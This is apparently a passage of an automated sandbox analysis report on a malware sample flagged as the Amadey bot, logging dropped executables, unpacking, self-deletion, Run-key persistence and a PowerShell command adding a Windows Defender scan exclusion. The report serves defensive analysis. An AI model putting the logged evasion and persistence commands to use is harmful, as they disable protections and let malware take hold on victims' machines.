                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\977B.exe C:\Users\user\AppData\Local\Temp\977B.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A557.exe C:\Users\user\AppData\Local\Temp\A557.exe
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /SpecialRun 4101d8 4380
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B084.exe C:\Users\user\AppData\Local\Temp\B084.exe
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess created: C:\Users\user\AppData\Local\Temp\977B.exe 977B.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\152F.exe C:\Users\user\AppData\Local\Temp\152F.exe
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2E26.exe C:\Users\user\AppData\Local\Temp\2E26.exe
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\977B.exe 'C:\Users\user\AppData\Local\Temp\977B.exe'
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeProcess created: C:\Users\user\Desktop\cnv622JnZv.exe 'C:\Users\user\Desktop\cnv622JnZv.exe'
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\66A4.exe C:\Users\user\AppData\Local\Temp\66A4.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\77DC.exe C:\Users\user\AppData\Local\Temp\77DC.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8615.exe C:\Users\user\AppData\Local\Temp\8615.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\977B.exe C:\Users\user\AppData\Local\Temp\977B.exe
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A557.exe C:\Users\user\AppData\Local\Temp\A557.exe
                        Source: C:\Users\user\AppData\Roaming\jejhiegProcess created: C:\Users\user\AppData\Roaming\jejhieg C:\Users\user\AppData\Roaming\jejhieg
                        Source: C:\Users\user\AppData\Local\Temp\C5EA.exeProcess created: C:\Users\user\AppData\Local\Temp\C5EA.exe C:\Users\user\AppData\Local\Temp\C5EA.exe
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\66A4.exe' -Force
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exe' /SpecialRun 4101d8 4380
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess created: C:\Users\user\AppData\Local\Temp\977B.exe 977B.exe
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeProcess created: unknown unknown
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeProcess created: unknown unknown
                        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: 25_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: 30_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C5EA.tmpJump to behavior
                        Source: A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
                        Source: A557.exe, 0000001D.00000000.427496231.00000000002D2000.00000002.00020000.sdmpBinary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: 25_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
                        Source: 977B.exe.6.dr, ??????????????/_?????xptkvqfesn.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\152F.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\user\AppData\Local\Temp\152F.exeFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                        Source: cnv622JnZv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                        Source: cnv622JnZv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                        Source: cnv622JnZv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                        Source: cnv622JnZv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: cnv622JnZv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                        Source: cnv622JnZv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                        Source: cnv622JnZv.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: C:\vojos\fuw.pdb source: 8615.exe, 00000018.00000000.413528464.0000000000417000.00000002.00020000.sdmp
                        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000019.00000000.418963154.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001E.00000000.426329937.000000000040C000.00000002.00020000.sdmp
                        Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: 977B.exe
                        Source: Binary string: C:\wucalehozojoh\setujupiwe-y.pdb source: C5EA.exe, 00000011.00000000.349456240.0000000000401000.00000020.00020000.sdmp, C5EA.exe, 00000012.00000000.364889434.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: C:\zowazaxopomuh-39\t.pdb source: cnv622JnZv.exe, 00000000.00000000.243398633.0000000000401000.00000020.00020000.sdmp, cnv622JnZv.exe, 00000003.00000000.254610819.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000010.00000000.348546236.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000013.00000000.368105637.0000000000401000.00000020.00020000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: 8615.exe, 00000018.00000002.441461960.000000006B451000.00000020.00020000.sdmp
                        Source: Binary string: wntdll.pdb source: 8615.exe
                        Source: Binary string: DC:\zowazaxopomuh-39\t.pdb source: cnv622JnZv.exe, 00000000.00000000.243398633.0000000000401000.00000020.00020000.sdmp, cnv622JnZv.exe, 00000003.00000000.254610819.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000010.00000000.348546236.0000000000401000.00000020.00020000.sdmp, jejhieg, 00000013.00000000.368105637.0000000000401000.00000020.00020000.sdmp

                        Data Obfuscation:

                        barindex
                        Detected unpacking (overwrites its own PE header)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\152F.exeUnpacked PE file: 35.2.152F.exe.400000.0.unpack
                        Source: C:\Users\user\AppData\Local\Temp\152F.exeUnpacked PE file: 35.2.152F.exe.400000.0.unpack
                        Detected unpacking (changes PE section rights)Show sources
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeUnpacked PE file: 24.2.8615.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
                        Source: C:\Users\user\AppData\Local\Temp\152F.exeUnpacked PE file: 35.2.152F.exe.400000.0.unpack .text:ER;.data:W;.rulofiv:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 0_2_02EC1118 push ds; ret
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeCode function: 23_2_00A7D37C push esi; iretd
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402E54 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402E63 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402665 push cs; ret
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_0040290C push eax; iretd
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402E16 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402DC0 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402DD8 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402DE8 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402DF1 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402E82 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402E85 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402D92 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402E95 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00401D9A pushad ; ret
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_00402E9C push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeCode function: 24_2_6B4CD0D1 push ecx; ret
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: 25_2_0040B550 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: 25_2_0040B550 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: 25_2_0040B50D push ecx; ret
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeCode function: 29_2_002DCF50 push ss; ret
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: 30_2_0040B550 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: 30_2_0040B550 push eax; ret
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: 30_2_0040B50D push ecx; ret
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeCode function: 33_2_02B61AB1 push ds; retf
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeCode function: 33_2_02B628C4 push esp; iretd
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeCode function: 33_2_02B62728 push ds; retf
                        Source: C:\Users\user\AppData\Local\Temp\B084.exeCode function: 33_2_02B61614 push edx; iretd
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_0040BDAD push eax; retn 0040h
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeCode function: 34_2_00410F16 push ecx; ret
                        Source: C:\Users\user\Desktop\cnv622JnZv.exeCode function: 0_2_00427590 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                        Source: 77DC.exe.6.drStatic PE information: 0x8B87D1F5 [Mon Mar 7 03:28:53 2044 UTC]
                        Source: cnv622JnZv.exeStatic PE information: section name: .mehepek
                        Source: 8615.exe.6.drStatic PE information: section name: .cipizi
                        Source: 2E26.exe.6.drStatic PE information: section name: .MPRESS1
                        Source: 2E26.exe.6.drStatic PE information: section name: .MPRESS2
                        Source: B084.exe.6.drStatic PE information: section name: .daya
                        Source: C5EA.exe.6.drStatic PE information: section name: .lufulac
                        Source: 152F.exe.6.drStatic PE information: section name: .rulofiv
                        Source: jejhieg.6.drStatic PE information: section name: .mehepek
                        Source: bejhieg.6.drStatic PE information: section name: .cipizi
                        Source: initial sampleStatic PE information: section where entry point is pointing to: .MPRESS2
                        Source: A557.exe.6.drStatic PE information: real checksum: 0x2bdee should be: 0x3529c
                        Source: 977B.exe.6.drStatic PE information: real checksum: 0x0 should be: 0xdd7bb
                        Source: 66A4.exe.6.drStatic PE information: real checksum: 0x8ddc4 should be: 0x7fd66
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.00461715058
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.38549549306
                        Source: initial sampleStatic PE information: section name: .text entropy: 6.98189062284
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.87137605191
                        Source: initial sampleStatic PE information: section name: .text entropy: 6.99265157433
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.85713092672
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.66944674948
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.00461715058
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.38549549306

                        Persistence and Installation Behavior:

                        barindex
                        Yara detected Amadey botShow sources
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jejhiegJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\bejhiegJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\977B.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\bejhiegJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeFile created: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8615.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\jejhiegJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeFile created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2E26.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C5EA.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\A557.exeFile created: C:\Users\user\AppData\Local\Temp\e0c15ae7-477f-4baa-ae46-babd861676a0\AdvancedRun.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A557.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\66A4.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\152F.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeFile created: C:\Users\user\AppData\Local\Temp\1105.tmpJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\77DC.exeJump to dropped file
                        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B084.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome
                        Source: C:\Users\user\AppData\Local\Temp\977B.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: 25_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

                        Hooking and other Techniques for Hiding and Protection:

                        barindex
                        DLL reload attack detectedShow sources
                        Source: C:\Users\user\AppData\Local\Temp\8615.exeModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\1105.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
                        Deletes itself after installationShow sources
                        Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\cnv622jnzv.exeJump to behavior
                        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                        Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\jejhieg:Zone.Identifier read attributes | delete
                        Source: C:\Users\user\AppData\Local\Temp\1196ed82-a1a7-4dc3-b900-4a59c1ae2518\AdvancedRun.exeCode function: 25_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\66A4.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\77DC.exeProcess information set: NOOPENFILEERRORBOX
